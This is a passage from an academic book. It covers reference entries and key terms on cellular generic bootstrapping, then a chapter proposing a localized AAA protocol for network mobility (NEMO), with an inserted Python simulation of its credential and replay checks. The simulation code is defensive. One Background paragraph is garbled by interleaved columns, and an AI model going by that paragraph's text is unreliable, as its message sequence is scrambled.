3rd Generation Partnership Project (3GPP) TS 33.220. (Release 6). Generic authentication architecture (GAA); Generic bootstrapping architecture. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33220.htm

3rd Generation Partnership Project (3GPP) TS 33.221. (Release 6). Generic authentication architecture (GAA); Support for subscriber certificates. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33221.htm

3rd Generation Partnership Project (3GPP) TS 33.222. (Release 6). Generic authentication architecture (GAA); Access to network application functions using hypertext transfer protocol over transport layer security (HTTPS). Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33222.htm

3rd Generation Partnership Project (3GPP) TS 33.223. (Release 8). Generic authentication architecture (GAA); Generic bootstrapping architecture (GBA) push function. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33223.htm

3rd Generation Partnership Project (3GPP) TS 33.246. (Release 6). 3G security; Security of multimedia broadcast/multicast service (MBMS). Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33246.htm

3rd Generation Partnership Project (3GPP) TR 33.918. (Release 7). Generic authentication architecture (GAA); Early implementation of hypertext transfer protocol over transport layer security (HTTPS) connection between a universal integrated circuit card (UICC) and a network application function (NAF). Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33918.htm

3rd Generation Partnership Project (3GPP) TR 33.920. (Release 7). SIM card based generic bootstrapping architecture (GBA); Early implementation feature. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33920.htm

3rd Generation Partnership Project (3GPP) TR 33.978. (Release 6). Security aspects of early IP multimedia subsystems (IMS), version 6.5.0. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33978.htm

Calhoun, P., Loughney, J., Guttman, E., Zorn, G., & Arkko, J. (2003). Diameter base protocol (RFC 3588). Retrieved from http://www.ietf.org/rfc/rfc3588.txt

Eronen, P., & Tschofenig, H. (Eds.). (2005). Pre-shared key ciphersuites for transport layer security (TLS) (RFC 4279). Retrieved from http://www.ietf.org/rfc/rfc4279.txt

European Telecommunications Standards Institute (ETSI). (n.d.). Telecoms & Internet converged services & protocols for advanced networks (TISPAN). Retrieved from http://www.etsi.org/tispan

European Telecommunications Standards Institute (ETSI) TS 187 003. (2006). Telecoms & Internet converged services & protocols for advanced networks (TISPAN); NGN security—Security architecture, version 1.1.1. Retrieved from http://www.etsi.org/tispan

Gerstenberger, V., Lahaije, P., & Schuba, M. (2004). Internet ID—Flexible re-use of mobile phone authentication security for service access. In Proceedings of the 9th (NordSec), Helsinki, Finland (pp. 58-64).

Open Mobile Alliance (OMA) BCAST Working Group. (2006). Broadcast service and content protection for mobile broadcast services, version 1.0. Retrieved from http://www.openmobilealliance.org/

Open Mobile Alliance (OMA) Location Working Group. (2006). Secure user plane location architecture (SUPL), version 3.0. Retrieved from http://www.openmobilealliance.org/
Open Mobile Alliance (OMA) Presence and Availability Working Group (PAG). (2006). Presence SIMPLE architecture, version 2.0. Retrieved from http://www.openmobilealliance.org/

Open Mobile Alliance (OMA) Presence and Availability Working Group (PAG). (2006). XML document management architecture (XDM), version 1.0. Retrieved from http://www.openmobilealliance.org/

Open Mobile Alliance (OMA) Security Working Group. (2005). OMA GBA profile, version 1.0. Retrieved from http://www.openmobilealliance.org/

Rescorla, E., & Modadugu, N. (2006). Datagram transport layer security (RFC 4347). Retrieved from http://www.ietf.org/rfc/rfc4347.txt

KEY TERMS

Application Security: Application security encompasses a large range of measures taken to prevent incidents with respect to the security policy of an application or the underlying framework. Application security is realized through design and deployment of the application.

Authentication And Key Agreement (AKA): AKA is a mechanism where a mobile device and mobile network operator authenticate and distribute shared key(s) to be used between them. This process is based on a long-term shared secret that is in the mobile terminal (namely in the UICC, e.g., SIM card) and in the mobile network operator’s databases (e.g., Home Location Register [HLR]). GBA is based on this process.

Authentication: Authentication is the attempt to verify the digital identity of the sender of an authentication request.

Cellular Authentication: Cellular authentication is the authentication process that is used when a mobile phone is attached to a network (e.g., GSM or UMTS network). This authentication is based on a smart card that is inserted in the mobile phone.

Generic Authentication Architecture (GAA): GAA is an architecture that is built on top of GBA that utilizes the shared secret to gain access to a service.

Generic Bootstrapping Architecture (GBA): GBA is an architecture where cellular authentication is used to bootstrap a shared secret between a mobile phone and a network node.

Mobile Application: A mobile application is an application that resides on a server and can be accessed or consumed by a mobile device. The application may require a dedicated software element in the mobile terminal (e.g., for mobile TV).

Second Generation Generic Bootstrapping Architecture (2G GBA): 2G GBA describes the usage of the GBA with legacy SIM smart cards. It does not contain the integration of legacy network nodes.

Universal Integrated Circuit Card (UICC): UICC is the smart card (e.g., SIM card) used in mobile terminals in GSM and UMTS networks.




Chapter XXV
Authentication,
Authorization, and Accounting
(AAA) Framework in Network
Mobility (NEMO) Environments
Sangheon Pack
Korea University, South Korea

Sungmin Baek
Seoul National University, South Korea

Taekyoung Kwon
Seoul National University, South Korea

Yanghee Choi
Seoul National University, South Korea

ABSTRACT

Network mobility (NEMO) enables seamless and ubiquitous Internet access while on-board vehicles. Even though the Internet Engineering Task Force (IETF) has standardized the NEMO basic support protocol as a network layer mobility solution, few studies have been conducted in the area of the authentication, authorization, and accounting (AAA) framework that is a key technology for successful deployment. In this article, we first review the existing AAA protocols and analyze their suitability for NEMO environments. After that, we propose a localized AAA framework to retain the mobility transparency of the NEMO basic support protocol and to reduce the signaling cost incurred in the AAA procedures. The proposed AAA framework supports mutual authentication and prevents various threats such as replay attack, man-in-the-middle attack, and key exposure. Performance analysis on the AAA signaling cost is carried out. Numerical results demonstrate that the proposed AAA framework is efficient in NEMO environments.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Authentication, Authorization, and Accounting Framework in Network Mobility Environments

INTRODUCTION

With the advances of wireless access technologies (e.g., third generation [3G], IEEE 802.11/16/20) and mobile communication services, the demand for Internet access in mobile vehicles such as trains, buses, and ships is constantly increasing (Ott & Kutscher, 2004). In these vehicles, there are multiple devices constituting a vehicular area network (VAN) or personal area network (PAN) that may access the Internet. This kind of service is referred to as network mobility (NEMO) service. Recently, many studies have been conducted on network mobility (Information Society Technologies [IST], 2003; Keio University, 2002). Regarding mobility management, the Internet Engineering Task Force (IETF) has established a working group called NEMO (IETF, 2006), and the NEMO working group has proposed an extended Mobile IPv6 protocol (Johnson, Perkins, & Arkko, 2003), that is, the NEMO basic support protocol (Devarapalli, Wakikawa, Petrescu, & Thubert, 2005). Throughout this chapter, we consider the NEMO basic support protocol as a mobility management framework.

According to the terminology in Ernst and Lach (2005), a mobile network (MONET) is defined as a network whose point of attachment to the Internet varies as it moves about. A MONET consists of mobile routers (MRs) and mobile network nodes (MNNs). Each MONET has a home network to which its home address belongs. When the MONET is in the home network, the MONET is identified by its home address (HoA). On the other hand, the MONET configures a care-of address (CoA) on the egress link when the MONET is away from the home network. At the same time, on the ingress link, the MNNs of the MONET configure CoAs, which are derived from the subnet prefix (i.e., mobile network prefix [MNP]). The MNP remains assigned to the MONET while it is away from the home network. The assigned MNP is registered with the home agent (HA) according to the NEMO basic support protocol.

The main objective of the NEMO basic support protocol is to preserve established communications between the MONET and correspondent nodes (CNs) during movements. Packets sent by CNs are first addressed to the home network of the MONET. Then, the HA intercepts the packets and tunnels them to the MR’s registered address, that is, the CoA on the egress link. To deliver packets towards the MR’s CoA, the NEMO basic support protocol makes a bi-directional tunnel between the HA and the MR. This tunneling mechanism is similar to the solution proposed for host mobility support, that is, Mobile IPv6 without route optimization.

To make network mobility services feasible in the public wireless Internet, well-defined authentication, authorization, and accounting (AAA) protocols should accompany them. However, to the best of our knowledge, little work has been conducted on AAA protocols in network mobility services. Even though a number of AAA protocols have been proposed for host mobility, all of them are based on per-node AAA operations and therefore they cannot be directly applied to the MONET containing two different types of MNNs: local fixed nodes (LFNs) and visiting mobile nodes (VMNs). An LFN belongs to the subnet of the MR and is unable to change its point of attachment, while a VMN is temporarily attached to the MR’s subnet by obtaining its CoA from the MNP. The VMN’s home network may have a different administrative policy (e.g., billing) from the currently attached MONET. Therefore, a new AAA procedure for VMNs is required.

In this chapter, we propose a localized AAA protocol that provides efficient AAA procedures for both LFNs and VMNs in NEMO environments. The proposed AAA protocol is consistent with the NEMO basic support protocol. In other words, individual AAA operations for LFNs within a MONET are not performed; instead, the MR is authenticated on behalf of the LFNs. On the other hand, each VMN attached to the MONET performs its AAA operation in an individual manner. The proposed AAA protocol has the following advantages: (1) the proposed AAA protocol localizes the AAA procedure using a local AAA key when the MR hands off within the same foreign network. Therefore, the AAA signaling traffic (and also the AAA latency) can be significantly reduced. We analyze the AAA signaling traffic via an analytical model in the
Signaling Cost Analysis section; (2) the proposed AAA protocol allows mutual authentication and prevents various security attacks such as replay attack and man-in-the-middle attack. The security analysis is given in the fourth section; (3) from the point of view of Internet service providers (ISPs), how to charge a VMN for its network usage is a critical issue. The proposed AAA protocol supports a flexible billing mechanism in which the VMN is informed of a billing agreement between the MR’s home network and the new foreign network. Accordingly, the proposed AAA protocol is a suitable solution when the MONET hands off between different networks with different billing or service policies.

The remainder of this chapter is organized as follows. In the next section, an existing AAA protocol for Mobile IPv6 is introduced as a reference protocol. The third section proposes a localized AAA protocol and the fourth section analyzes the security of the proposed AAA protocol. In the fifth section, an analytical model for the AAA signaling cost is developed and numerical results are presented. The sixth section concludes this chapter.

Figure 1. Mobile IPv6 AAA architecture (figure: HA and AAAh in the home network; AAAv and two ARs on foreign link 1 and foreign link 2 in the foreign network; a mobile node; the Internet (IPv6) in between)

BACKGROUND

In this section, the AAA protocol in Mobile IPv6 is described as a reference model. Although several AAA protocols have been proposed in the literature, we adopt the Diameter extension for the Mobile IPv6 protocol (Le, Patil, Perkins, & Faccin, 2004) because it is the only valid IETF Internet draft as of this writing. The Diameter extension for Mobile IPv6 allows a mobile node (MN) to access a network of a service provider after the AAA procedure based on the Diameter protocol (Calhoun, Loughney, Guttman, Zorn, & Arkko, 2003) is completed.

This protocol considers a network architecture for AAA services, as shown in Figure 1. The AAAv is an AAA server in the visited (foreign) network, while the AAAh is an AAA server in the home network of the MN. Hereafter, we assume that the AAA client is located at each access router (AR). The AAA client performs three tasks: (1) allowing the MN to be authenticated, (2) generating accounting data for the MN’s network usage, and (3) authorizing the MN to use network resources. By Le et al. (2004), an MN is identified by its network access identifier (NAI) (Aboba & Beadles,
1999), which is globally unique. An MN and its receipt of the HOR message, the HA creates a key to
AAAh have a long-term key, and communication establish a security association (SA) with the MN,
between the AAAv and AAAh is secure. and replies with a Home-Agent-MIPv6-Answer
Themessageow fl intheDiameterextension for (HOA) message to the AAAh. Then,
Command
Mobile IPv6 is illustrated in Figure 2. When enter- the AAAh constructs the AA-Registration-Answer
ing a new network or at power up, an MN listens Command (ARA) message that has an authen-
to an AR’s router advertisement (RA) message tication result and sends it to the AAAv. When
which has a local challenge and a visited network receiving the ARA message from the AAAh, the
identifier. Then, the MN sends an
authentication AAAv stores the authentication result locally and
request (AReq) message to the AAA client (i.e., AR) then forwards the message to the AAA client. The
based on the security key shared with its AAAh. AAA client converts the ARA message into the
When the AAA client receives the AReq message, authentication reply (ARep) message, in order to
it creates an AA-Registration-Request Command inform the MN of the authentication result from
(ARR) message and sends it to the AAAv. Then, the AAAh and deliver the established key (for the
the AAAv relays it to the AAAh of the MN. When SA) to the MN.
receiving the ARR message from the AAAv, the
AAAh authenticates the MN by means of the
NAI and sends a Home-Agent-MIPv6-Request
Command (HOR) message to the MN’s HA. Upon

Figure 2. Message flow in the AAA protocol for Mobile IPv6

LOCALIZED AAA FRAMEWORK IN NEMO ENVIRONMENTS

System Architecture

In this section, the AAA architecture in NEMO environments is introduced with basic assumptions and concepts (e.g., SA and challenge/response authentication). Figure 3 illustrates the reference AAA architecture in NEMO environments based on the Diameter protocol.

The AAA architecture consists of multiple autonomous wireless networks, each of which is called a domain. Each domain has an AAAH server and/or an AAAL server in order to authenticate any node in a Diameter-compliant manner. The AAAH server of the MR has the profile of the MR and it shares a long-term key with the MR. Likewise, the AAAH server of the VMN shares a long-term key with the VMN. The AAAL server is in charge of an AAA procedure for a visiting MONET (i.e., VMNs and MRs). The trust relationship between the MR’s AAAH server and the AAAL server in the visited network is maintained through the Diameter protocol.

When the MONET changes its point of attachment, the MR needs to be authenticated and authorized before it accesses a new domain in the same foreign network (i.e., intra-domain handoff) or a new foreign network (i.e., inter-domain handoff). To accomplish this, the MR and AR authenticate each other through a mutual authentication procedure that involves both the AAAH server of the MR and the AAAL server of the AR. An attendant (which is the same as an AAA client) is an entity that triggers authentication procedures to the AAA system. In Mobile IPv6 networks, ARs normally act as the attendants for an MN. In the proposed AAA protocol, the AR serves as an attendant for the MR’s authentication, whereas the MR serves as an attendant for the VMN’s authentication. In the latter case, the MR broadcasts attendant advertisement messages and receives authentication request messages from VMNs within a MONET. In other words, an attendant (an AR or MR) requests the AAAL server to authenticate the MONET (the MR or VMN). When the AAAL server receives the authentication request, it verifies the identity of the MONET by cooperating with an AAAH server. In terms of SAs, we assume that the MR’s AAAH server and the VMN’s AAAH server have a pre-established SA. In addition, it is assumed that the MR and LFNs have already authenticated each other by a mechanism which is beyond the scope of this chapter.

Figure 3. AAA architecture in NEMO environments (home links of the VMN and of the MR, each with its HA and AAAH server, AAAH_VMN and AAAH_MR; the Internet (IPv6); a foreign network with the AAAL server and ARs on foreign links 1 to 4; the MR with its MNNs forming the NEMO; arrows mark the movement of the MONET)

Notations used in this chapter are summarized in Table 1. A local challenge (LC) is a random number for authentication procedures. An MR or VMN encrypts the LC using a pre-defined SA with its AAAH server. The encrypted value is called a credential (CR), which is used to authenticate the MR that creates it. MRs and VMNs are identified by their NAIs and a replay protection indicator (RPI), which is used to protect from a replay attack. Either a timestamp or a random number can be used as an RPI. The size of the K_AAA field is 128 bytes by assuming a public key cryptography algorithm. We adopt a symmetric key cryptography for the dynamic keys K_LOCAL and K_HOME, and their sizes are 32 bytes. Note that a dynamic key is used to establish a dynamic SA while a long-term key is used to establish a long-term SA. Other notations will be elaborated later.

In the proposed AAA protocol, we define two Internet Control Message Protocol (ICMP) messages (Conta & Deering, 1998), Attendant Solicit and Attendant Advertisement messages, which are similar to Router Solicit and Router Advertisement messages, respectively. In these messages, we introduce a new Attendant advertisement option, which is used for the authentication of VMNs for an intra-domain handoff. In addition, several Diameter messages, for example, AA-Mobile-Router-Request and AA-Mobile-Router-Answer, are defined. Their functions will be described later.

Table 1. Notations for the localized AAA protocol

Field       Meaning                                                    Typical length (bytes)
LC          local challenge                                            8
MC          mobile challenge                                           8
NAI         identity of MR or VMN                                      20
RPI         replay protection indicator                                4
H@          home address                                               16
HA@         home agent address                                         16
Co@         care-of address of MR or VMN                               16
K_AAA       pre-shared SA between an MR and an AAAH server             128 (public key)
K_AH        pre-shared SA between an AAAH server and an HA             128 (public key)
K_AL        pre-shared SA between an AAAH server and an AAAL server    128 (public key)
CR          credential                                                 8
CR_L        local credential                                           8
K_LOCAL     dynamic SA between an MR and an AAAL server                32 (symmetric key)
CR_M        mobile credential                                          8
K_HOME      dynamic SA between an MR and its AAAH server               32 (symmetric key)
SP_LOCAL    security parameters for constructing K_LOCAL               12
SP_HOME     security parameters for constructing K_HOME                12
Mobile Router Authentication

Inter-Domain AAA Procedure

When a MONET enters a new foreign network domain, an inter-domain AAA procedure is triggered. Since the MR does not have any SA with the AAAL server in the foreign network domain, it should be authenticated with its AAAH server located in its home network domain. The message flows for the inter-domain AAA procedure are illustrated in Figure 4 and the detailed descriptions are as follows:

• Step 1: The MR sends an Attendant Solicit message to the attendant, that is, the AR.
• Step 2: As a response to the Attendant Solicit message, the AR sends an Attendant Advertisement message including an LC. Even without the Attendant Solicit message, the AR broadcasts Attendant Advertisement messages periodically.
• Step 3: The MR encrypts the received LC value using its long-term SA with the AAAH server and makes a CR, which enables the MR’s AAAH server to authenticate the MR. Then, the MR sends an AReq message that contains the LC and CR to the AR (i.e., attendant). The AReq message also contains the MR’s NAI and RPI, which are used by the AAAL server to identify the MR’s home domain and to protect from replay attack.
• Step 4: When the AR receives the AReq message, it converts it into an AA-Mobile-Router-Request (AMR) message. Then, the AR sends the AMR message to the AAAL server in the foreign domain.
• Step 5: The AAAL server detects that it cannot authenticate the MR locally by checking the NAI field and hence forwards the AMR message to the MR’s AAAH server. When the AAAH server receives the AMR message, it encrypts the LC using the pre-established SA and compares the result with the CR value. If these two values are identical, the MR is successfully authenticated. Then, the AAAH server generates two dynamic keys: one is K_LOCAL (to be explained later) for intra-domain AAA procedures in the foreign domain and the other is K_HOME for a secure bi-directional tunnel between the MR and the MR’s HA. To allow the MR to generate K_LOCAL and K_HOME, the AAAH server also generates SP_HOME and SP_LOCAL, and sends them to the MR. These security parameters are encrypted using the long-term key between the MR and the AAAH server to avoid the possibility of exposure to other network entities.
• Step 6: The AAAH server informs the HA of the MR’s NAI and SP_HOME using the AA-Home-Agent-Request (AHR) message.
• Step 7: The HA constructs K_HOME by using SP_HOME and replies with an AA-Home-Agent-Answer (AHA) message as confirmation.
• Step 8: The AA-Mobile-Router-Answer (AMA) message is used by the AAAH server to notify the AAAL server of the authentication result. When the AAAL server receives the AMA message with authentication approval, the AAAL server decrypts the message using the long-term key (K_AL) shared with the AAAH server, records the MR’s NAI, and constructs K_LOCAL.
• Step 9: The AAAL server re-encrypts the AMA message received from the AAAH server after excluding E_{K_AL}(SP_LOCAL) and sends it to the AR.
• Step 10: When receiving the AMA message, the AR learns that the MR is successfully authenticated and grants the MR network access. Therefore, the AR informs the MR of the result by the ARep message containing SP_HOME, SP_LOCAL, the home agent address, and so forth. On receipt of the ARep message with authentication approval, the MR can access the foreign network. At the same time, the MR generates K_HOME and K_LOCAL using SP_HOME and SP_LOCAL, respectively.

Figure 4. MR’s AAA procedure for inter-domain handoff

Intra-Domain AAA Procedure

To support real-time multimedia applications in NEMO environments, it is important to reduce the latency of AAA operations. Therefore, when a MONET changes its point of attachment within the same foreign domain, our protocol enables the MR to be authenticated through a localized AAA procedure with the AAAL server in the foreign network without any interaction with its AAAH server. That is, the AAAL server of the foreign network can authenticate the MR using K_LOCAL, which was introduced for the inter-domain AAA procedure in the previous section.

Figure 5 illustrates the intra-domain AAA procedure. As a response to the Attendant Advertisement message, the MR sends the AReq message containing CR_L, which is different from the CR used in the inter-domain AAA procedure. At this time, the AReq message also contains an MC for mutual authentication. The CR_L is an authentication code generated using K_LOCAL. Then, the attendant constructs an AA-Mobile-Router-Local-Request (AMLR) Diameter message and sends it to the AAAL server. When the AAAL server receives the AMLR message, the AAAL server authenticates the MR by using K_LOCAL, which has already been stored at the AAAL server during the inter-domain AAA procedure. Moreover, the AAAL server constructs CR_M by encrypting the MC value and informs the AR of the result via the AA-Mobile-Router-Local-Answer (AMLA) message. Then, the AR transmits the result (i.e., the ARep message) to the MR. The MR receiving the ARep message verifies the CR_M value to authenticate the foreign network, that is, mutual authentication.
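The MR’s inter-domain steps 3, 5, 8 and 10 and the intra-domain CR_L/CR_M exchange above, as an added example that is not the chapter’s code (it also performs the CR and CR_M checks that the Security Analysis section later writes as equations (1) and (2)). It assumes that the chapter’s E_K(·) can be stood in for by HMAC-SHA256 truncated to the 8-byte CR length, that K_LOCAL and K_HOME are derived from the SP values with SHA-256, and that the RPI is a timestamp; the NAI and all keys are constructed, and the encryption of SP values under K_AAA/K_AL is not modelled.

```python
"""Challenge/response checks of the localized AAA protocol for an MR (added example,
not the chapter's code).  Assumptions: E_K(x) of equations (1)/(2) is modelled as
HMAC-SHA256 truncated to the 8-byte CR length of Table 1; K_LOCAL/K_HOME are derived
from SP_LOCAL/SP_HOME with SHA-256; the RPI is a 4-byte timestamp."""
import hashlib
import hmac
import os

CR_LEN, SP_LEN = 8, 12     # CR/CR_L/CR_M and SP_LOCAL/SP_HOME lengths (Table 1)
RPI_WINDOW = 30            # seconds an RPI timestamp stays acceptable (assumption)


def credential(key: bytes, challenge: bytes, nai: bytes, rpi: bytes) -> bytes:
    """Keyed credential over a challenge, bound to the sender's NAI and RPI."""
    return hmac.new(key, challenge + nai + rpi, hashlib.sha256).digest()[:CR_LEN]


def derive_key(sp: bytes, label: bytes) -> bytes:
    return hashlib.sha256(label + sp).digest()   # 32-byte dynamic key (K_LOCAL or K_HOME)


def rpi_fresh(seen: set, nai: bytes, rpi: bytes, now: int) -> bool:
    # Replay check: timestamp inside the window and not yet used by this NAI.
    return abs(now - int.from_bytes(rpi, "big")) <= RPI_WINDOW and (nai, rpi) not in seen


class AAAHServer:
    """Home AAA server of the MR: verifies CR = E_KAAA(LC) (inter-domain step 5)."""
    def __init__(self, k_aaa_by_nai: dict):
        self.k_aaa_by_nai, self.seen = k_aaa_by_nai, set()

    def authenticate(self, nai, lc, cr, rpi, now):
        key = self.k_aaa_by_nai.get(nai)
        if key is None or not rpi_fresh(self.seen, nai, rpi, now):
            return None
        if not hmac.compare_digest(cr, credential(key, lc, nai, rpi)):
            return None
        self.seen.add((nai, rpi))
        return os.urandom(SP_LEN), os.urandom(SP_LEN)   # fresh SP_LOCAL, SP_HOME


class AAALServer:
    """Local AAA server: stores K_LOCAL at step 8, then serves intra-domain
    handoffs (Figure 5) without contacting the AAAH server."""
    def __init__(self):
        self.k_local_by_nai, self.seen = {}, set()

    def record(self, nai, sp_local):
        self.k_local_by_nai[nai] = derive_key(sp_local, b"K_LOCAL")

    def authenticate_local(self, nai, lc, cr_l, mc, rpi, now):
        key = self.k_local_by_nai.get(nai)
        if key is None or not rpi_fresh(self.seen, nai, rpi, now):
            return None      # unknown MR or replayed AReq: needs the inter-domain procedure
        if not hmac.compare_digest(cr_l, credential(key, lc, nai, rpi)):
            return None
        self.seen.add((nai, rpi))
        return credential(key, mc, nai, rpi)   # CR_M = E_KLOCAL(MC), equation (2)


class MobileRouter:
    def __init__(self, nai: bytes, k_aaa: bytes):
        self.nai, self.k_aaa, self.k_local, self.k_home = nai, k_aaa, None, None

    def areq_inter(self, lc, now):             # step 3: CR = E_KAAA(LC) plus NAI and RPI
        rpi = now.to_bytes(4, "big")
        return self.nai, lc, credential(self.k_aaa, lc, self.nai, rpi), rpi

    def accept_inter(self, sp_local, sp_home):   # step 10: build K_LOCAL and K_HOME
        self.k_local = derive_key(sp_local, b"K_LOCAL")
        self.k_home = derive_key(sp_home, b"K_HOME")

    def areq_intra(self, lc, now):             # CR_L under K_LOCAL plus a mobile challenge MC
        rpi, mc = now.to_bytes(4, "big"), os.urandom(8)
        return self.nai, lc, credential(self.k_local, lc, self.nai, rpi), mc, rpi

    def verify_network(self, mc, rpi, cr_m):   # MR authenticates the foreign network
        return hmac.compare_digest(cr_m, credential(self.k_local, mc, self.nai, rpi))


def run_handoffs(now: int = 1_700_000_000):
    """Inter-domain handoff, a replayed AReq, then an intra-domain handoff; returns
    (inter_ok, replay_rejected, intra_ok, fake_network_rejected)."""
    k_aaa = os.urandom(32)
    mr = MobileRouter(b"mr1@home.example", k_aaa)          # constructed NAI
    aaah, aaal = AAAHServer({mr.nai: k_aaa}), AAALServer()
    lc = os.urandom(8)                                      # LC from the Attendant Advertisement
    nai, lc, cr, rpi = mr.areq_inter(lc, now)
    sps = aaah.authenticate(nai, lc, cr, rpi, now)          # AReq -> AMR -> AAAL -> AAAH
    inter_ok = sps is not None
    if inter_ok:
        aaal.record(nai, sps[0])                            # AMA delivers SP_LOCAL to the AAAL
        mr.accept_inter(*sps)                               # ARep delivers SP_LOCAL/SP_HOME
    replay_rejected = aaah.authenticate(nai, lc, cr, rpi, now) is None   # same AReq again
    lc2 = os.urandom(8)                                     # new AR, new LC, AAAH not involved
    nai, lc2, cr_l, mc, rpi2 = mr.areq_intra(lc2, now + 5)
    cr_m = aaal.authenticate_local(nai, lc2, cr_l, mc, rpi2, now + 5)
    intra_ok = cr_m is not None and mr.verify_network(mc, rpi2, cr_m)
    fake_rejected = not mr.verify_network(mc, rpi2, os.urandom(CR_LEN))  # no K_LOCAL, no CR_M
    return inter_ok, replay_rejected, intra_ok, fake_rejected
```

`run_handoffs()` returns `(True, True, True, True)`: the AAAH accepts the first AReq and rejects its replay, the AAAL authenticates the intra-domain AReq from K_LOCAL alone, and a network without K_LOCAL cannot produce a valid CR_M.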

Figure 5. MR’s AAA procedure for intra-domain handoff

Visiting Mobile Node (VMN) Authentication

A VMN is a visiting MN that accesses the Internet through an MR in a MONET. According to the NEMO basic support protocol, the VMN does not need to know whether its attached router is the AR or the MR. Therefore, the AAA protocol for VMNs should be consistent with this requirement. The VMN in a MONET uses the home network prefix of the MR as its IPv6 network prefix. Accordingly, the VMN will deem itself to be in the MR’s home network. For VMN authentication, the MR serves as an attendant for VMNs and the MR’s AAAH server serves as an AAAL server.

Figure 6 illustrates the message flows for the AAA procedure when a VMN is attached to a MONET. As mentioned previously, the MR acts as an attendant. Hence, the MR broadcasts Attendant Advertisement messages periodically or responds to an Attendant Solicit message from the VMN with an Attendant Advertisement message. The VMN creates a CR using a pre-shared SA with its AAAH server (AAAH_VMN) and sends an AReq message to the MR. Then, the MR converts the AReq message into a Diameter message, AMR, and sends it to the MR’s AAAH server (AAAH_MR) through a secured bi-directional tunnel. When the AAAH_MR receives the AMR message, it sends the AMR message to the AAAH_VMN, with which it has a shared SA, and requests the AAA procedure for the VMN. Then, the AAAH_VMN authenticates the VMN. During these steps, K_HOME, K_LOCAL, SP_HOME, and SP_LOCAL are created, similarly to the inter-domain AAA procedure of the MR. After completion of the AAA procedures, the VMN registers its CoA (configured using the MNP) with its HA.

After the initial authentication and binding update procedures, VMNs within a MONET do not need to know whether the MONET changes its point of attachment or not. Thus, VMNs do not have to register their locations with their HAs even though the MONET hands off. This mobility transparency is the key advantage of the NEMO basic support protocol. However, if the mobility transparency is strictly provided, the AAAL server in the foreign network cannot detect the existence of VMNs. In other words, the mobility transparency is beneficial to reduce the binding update traffic; however, it makes the accounting/billing of VMNs’ network usages hard. To address this problem, in our protocol, the AAAL server in the

Figure 6. VMN’s AAA procedure

foreign domain accounts the total network usage of the MONET (not individual VMNs) and then this collective accounting/billing information is delivered to the MR’s AAAH server. At the same time, the MR’s AAAH server maintains the accounting/billing information for the MR as well as for individual VMNs.¹ Consequently, the MR’s AAAH server can differentiate the accounting/billing information for MRs and VMNs. In addition, we assume that the MR’s AAAH server and the VMN’s AAAH server have a trust relationship and a shared SA. Therefore, the accounting/billing information collected at the MR’s AAAH server is securely transferred to the VMN’s AAAH server for suitable billing.

In addition, the mobility transparency causes another problem, that is, how to authorize VMNs when the MONET moves to a foreign domain with a different billing policy. To solve this problem, an MR sends an Attendant Advertisement message with the R bit set when the foreign domain has a different policy and thus a new AAA procedure is required. Hence, from the Attendant Advertisement message, the VMN determines whether it should perform a new AAA procedure or not. We assume that each network domain can have different policies, so that the VMN performs a new AAA procedure for each inter-domain handoff.

SECURITY ANALYSIS

In this section, we analyze the proposed AAA protocol in terms of mutual authentication and security attacks (e.g., key exposure, replay attack, and man-in-the-middle attack).

Mutual Authentication

Mutual authentication is a security feature in which a client (i.e., the MR and VMN) must prove its identity to a service (i.e., network), and the service must prove its identity to the client. To provide mutual authentication in the NEMO AAA protocol, two requirements should be satisfied: (1) the MR or VMN authenticates the foreign network; and (2) the foreign network authenticates the MR or VMN.

Specifically, mutual authentication in the proposed AAA protocol is achieved as follows. First, for the inter-domain authentication, mutual authentication is provided by establishing a session key, K_LOCAL. In other words, the objective of the inter-domain authentication protocol is that the MR and the AAAL server believe that they share K_LOCAL with each other. The MR creates CR as

$$CR = E_{K_{AAA}}(LC) \qquad (1)$$

where E_K(·) is an encryption function using a key K. The AAAH server can verify the MR’s identity by comparing the CR sent by the MR with the CR constructed by the AAAH server itself. If the two values are identical, the MR is successfully authenticated. Otherwise, the authentication fails. In our protocol, a malicious MR cannot create the correct CR because it does not have K_AAA. After verifying the identity of the MR, the AAAH server transmits E_{K_AAA}(SP_LOCAL) and E_{K_AL}(SP_LOCAL) to the AAAL server through a secure path. When the AAAL server receives them, it constructs K_LOCAL using E_{K_AL}(SP_LOCAL) and forwards E_{K_AAA}(SP_LOCAL) to the MR. At last, the MR constructs K_LOCAL using E_{K_AAA}(SP_LOCAL). After this procedure, the MR and the AAAL server share K_LOCAL.

For the intra-domain authentication, the AAAL server in the foreign network verifies the identity of the MR by comparing E_{K_LOCAL}(LC) constructed by the AAAL server with the CR_L sent by the MR. On the other hand, to authenticate the foreign network, the MR uses an MC and CR_M. The AAAL server in the foreign network sends CR_M, which is created by

$$CR_M = E_{K_{LOCAL}}(MC) \qquad (2)$$

Then, the MR can authenticate the AAAL server in the foreign network by verifying that E_{K_LOCAL}(MC) is equal to CR_M. Consequently, a malicious network cannot offer fake services to an MR because it cannot compute CR_M, and mutual authentication is achieved.

Key Exposure

K_AAA is a pre-shared key between an MR and the AAAH server, and K_LOCAL and K_HOME are created using the security parameters SP_LOCAL and SP_HOME, respectively. Thus, it is desirable not to leak these keys to the other network entities.

With respect to K_LOCAL, the AAAH server encrypts SP_LOCAL using K_AL and sends it to the AAAL server. At the same time, the AAAH server sends SP_LOCAL encrypted using K_AAA to the MR. Therefore, the encrypted SP_LOCAL can be decrypted only by the AAAL server and the MR because they have K_AL or K_AAA. In other words, if K_AL and K_AAA are not exposed, no entity except the AAAL server and the MR can know SP_LOCAL and thus none can construct K_LOCAL. Similarly, SP_HOME is encrypted using K_AH and K_AAA, and delivered to the HA and the MR, respectively. Therefore, K_HOME derived from SP_HOME is not revealed to any entity except the HA and the MR.

Replay Attack

A replay attack involves the passive capture of data and its subsequent retransmission to produce an unauthorized effect. A malicious node keeps an AReq message and can then retransmit the old AReq message to trick the AAAL server into a false authentication. In our protocol, LC is created randomly and hence always changes, and therefore the malicious node cannot replay the old AReq message. Even if the same LC is selected by the attendant, the RPI (i.e., timestamp) can prevent the replay attack.

Man-in-the-Middle Attack

A man-in-the-middle attack means that an attacker is able to read, insert, and modify messages

